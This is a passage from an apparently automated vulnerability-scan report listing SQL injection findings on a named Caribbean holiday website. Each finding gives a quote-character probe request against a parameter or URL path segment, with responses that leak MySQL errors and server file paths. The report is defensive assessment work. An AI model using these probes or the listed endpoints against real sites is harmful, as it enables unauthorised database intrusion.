Content-Length: 6881

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.75. http://www.caribbean-ocean.com/enquiry.php [accomm_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /enquiry.php

Issue detail

The accomm_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the accomm_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /enquiry.php?accomm_id=9026' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:27 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 19026

<html>
<head>

<link href="styles.css" type="text/css" rel="stylesheet" />
<script src="tabs.js" type="text/javascript"></script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text
...[SNIP]...
<div style="height:auto; padding:15px;">
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/enquiry.php on line 299
<!-- HERE! -->
...[SNIP]...

1.76. http://www.caribbean-ocean.com/enquiry.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /enquiry.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /enquiry.php?accomm_id=/1'9026 HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:43 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 19036

<html>
<head>

<link href="styles.css" type="text/css" rel="stylesheet" />
<script src="tabs.js" type="text/javascript"></script>
<script src="http://www.skichalets.co.uk/top/Crossfader.js" type="text
...[SNIP]...
<div style="height:auto; padding:15px;">
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'9026' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/enquiry.php on line 299
<!-- HERE! -->
...[SNIP]...

1.77. http://www.caribbean-ocean.com/gallery.php [accomm_id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /gallery.php

Issue detail

The accomm_id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the accomm_id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /gallery.php?accomm_id=9026' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:26 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7059
Connection: close
Content-Type: text/html

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/gallery.php on line 34
<html>
...[SNIP]...

1.78. http://www.caribbean-ocean.com/gallery.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /gallery.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /gallery.php?accomm_id=/1'9026 HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:57:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7069
Connection: close
Content-Type: text/html

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'9026' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/gallery.php on line 34
<html>
...[SNIP]...

1.79. http://www.caribbean-ocean.com/get-image.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /get-image.php?id=18696' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:45:29 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.80. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /get-image.php?id=1/1'8696 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:46:52 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.81. http://www.caribbean-ocean.com/luxury%20Anguilla%20Resort%20holidays/112 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Anguilla%20Resort%20holidays/112

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Anguilla%20Resort%20holidays/112' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:54:53 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.82. http://www.caribbean-ocean.com/luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.83. http://www.caribbean-ocean.com/luxury%20Aruba%20Resort%20holidays/307 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Aruba%20Resort%20holidays/307

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Aruba%20Resort%20holidays/307' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:21 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.84. http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Bahamas%20Resort%20holidays/116

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Bahamas%20Resort%20holidays/116' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:48:36 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.85. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Barbados%20Resort%20holidays/91' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:37 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6887
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.86. http://www.caribbean-ocean.com/luxury%20Bermuda%20Resort%20holidays/119 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Bermuda%20Resort%20holidays/119

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Bermuda%20Resort%20holidays/119' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:54:24 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.87. http://www.caribbean-ocean.com/luxury%20Bonaire%20Island%20holidays/308 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Bonaire%20Island%20holidays/308

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Bonaire%20Island%20holidays/308' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:42 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.88. http://www.caribbean-ocean.com/luxury%20British%20Virgin%20Islands%20holidays/108 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20British%20Virgin%20Islands%20holidays/108

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20British%20Virgin%20Islands%20holidays/108' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:55:53 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.89. http://www.caribbean-ocean.com/luxury%20Cayman%20Islands%20holidays/115 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Cayman%20Islands%20holidays/115

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Cayman%20Islands%20holidays/115' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:07 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.90. http://www.caribbean-ocean.com/luxury%20Cuba%20Resort%20holidays/118 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Cuba%20Resort%20holidays/118

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Cuba%20Resort%20holidays/118' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:09 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.91. http://www.caribbean-ocean.com/luxury%20Curacao%20holidays/305 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Curacao%20holidays/305

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Curacao%20holidays/305' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:14 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.92. http://www.caribbean-ocean.com/luxury%20Dominica%20holidays/111 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Dominica%20holidays/111

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /luxury%20Dominica%20holidays/111' HTTP/1.1
Host: www.caribbean-ocean.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=1hct2at14q111odod9snhodthrvo0a03;

Response

HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 01:56:22 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6888
Connection: close
Content-Type: text/html

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

1.93. http://www.caribbean-ocean.com/luxury%20Dominican%20Republic%20Resort%20holidays/302 [REST URL parameter 2]
